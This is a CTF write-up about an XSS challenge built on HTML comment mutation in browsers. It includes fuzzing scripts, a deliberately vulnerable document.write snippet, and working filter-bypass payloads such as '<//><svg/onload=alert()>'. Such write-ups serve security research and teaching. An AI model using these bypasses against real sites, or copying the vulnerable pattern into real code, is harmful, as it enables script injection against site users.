+++
title = "Uncomment Me"
description = "Aperi'CTF 2019 - Web"
keywords = "Web, XSS, mutation, comment, WriteUp, CTF, Aperi'CTF, Apéri'CTF, Aperi'CTF, ApériCTF, Aperi'Kube, Apéri'Kube, AperiKube, ApériKube"
date = "2019-09-14T00:00:00+02:00"
weight = 20
draft = false
bref = "Aperi'CTF 2019 - Web"
toc = true
+++

# Uncomment Me

### TL;DR

Using fuzzing to find a html comment mutation, that bypass filter to achieve a XSS.

### Introduction

I had the idea of this challenge after another one I created for the [Aperi'CTF](https://www.aperikube.fr/docs/aperictf_2019/), [TMNT](https://www.aperikube.fr/docs/aperictf_2019/tmnt/). It was a mutant XSS where it was necessary to get out of a comment. One of the players (Yacine) found an interesting solution, so I decided to continue with what he found.

### The first discovery

For TMNT my solution was to use `<!>` to get out of the comment. Indeed, once mutted, `<!>` becomes `<!---->`.

```shell
> t = document.createElement('template');
> t.innerHTML = '<!>';
> t.innerHTML
    "<!---->"
```

Yacine found that it was also possible to have the same behavior but with `<?>`, which was transformed into `<!--?-->`.

This seems surprising because according to the [W3C](https://html.spec.whatwg.org/multipage/syntax.html#comments) a comment must start with the string `<!--`, but browsers took some liberties.


### Let's go fuzzing

From that moment, I thought that there could surely be other mutations of the same type, so I decided to fuzz. For that I use a [LiveOverflow video](https://www.youtube.com/watch?v=yq_P3dzGiK4) where it presents a parsing bug in Firefox discovered by [Gareth Heyes](https://twitter.com/garethheyes). I took the code and adapted it to my case:

```javascript
d = document.createElement('div');
for (i = 0; i <= 0x10ffff; i++) {
    d.innerHTML = '<' + String.fromCodePoint(i) + '-- comment -->';
    if (d.innerHTML.includes('<!')) {
        console.log(i + ' : ' + String.fromCharCode(i))
    }
}
```

The script will try a set of characters instead of the `!` conventionally used in the declaration of an html comment and check if it's mutted to a comment.

This is the output:
```
33 : !
47 : /
63 : ?
```

`!` is the normal case and `?` has already been found, but `/` is interesting, we will go further with this one.

### Slash it

`</-- comment -->` is mutted to `<!---- comment ---->`, there is rather strange behavior with the double `--`. So I wondered if hyphens are mandatory or if it's possible to use other characters. For that I rewrote a fuzzing script:

```javascript
d = document.createElement('div');
for (i = 0; i <= 0x10ffff; i++) {
    d.innerHTML = '</' + String.fromCodePoint(i) + ' comment -->';
    if (!d.innerHTML.includes('<!')) {
        console.log(i + ' : ' + String.fromCharCode(i))
    }
}
```

It outputs all characters that cannot be used after `/`, and surprisingly there is only a few results: `>` and `a-zA-Z`. This result is understandable because a tag of the type `</x>` will not be mutted because it can correspond to a closing tag. What is more surprising is that it's therefore possible to use almost any character after the `/` so that the tag is mutated into a comment.

Examples:

- `</1>` -> `<!--1-->`
- `<//>` -> `<!--/-->`
- `</<>` -> `<!--<-->`

It works in Firefox, Chrome, IE, Edge and Opera.

### Challenge

I decided to make a little challenge with this finding.

```javascript=
s = new URL(window.location.href).searchParams.get('s');

if (!s.includes('!') && !s.includes('-')) {
    t = document.createElement('template');
    t.innerHTML = s;
    document.write('<!-- ' + t.innerHTML + ' -->');
}
```

The first solutions arrived quickly ([@Blaklis_](https://twitter.com/Blaklis_), [@BitK_](https://twitter.com/Blaklis_) and [@garethheyes](https://twitter.com/garethheyes)), but weren't the ones expected. Here is the type of payload they used: `<x x="%26%23x2d;%26%23x2d;%26gt;"><svg/onload=alert()>`.

Expected solutions: `<?><svg/onload=alert()>` and `<//><svg/onload=alert()>`.


[DrStache](https://twitter.com/DrStache_)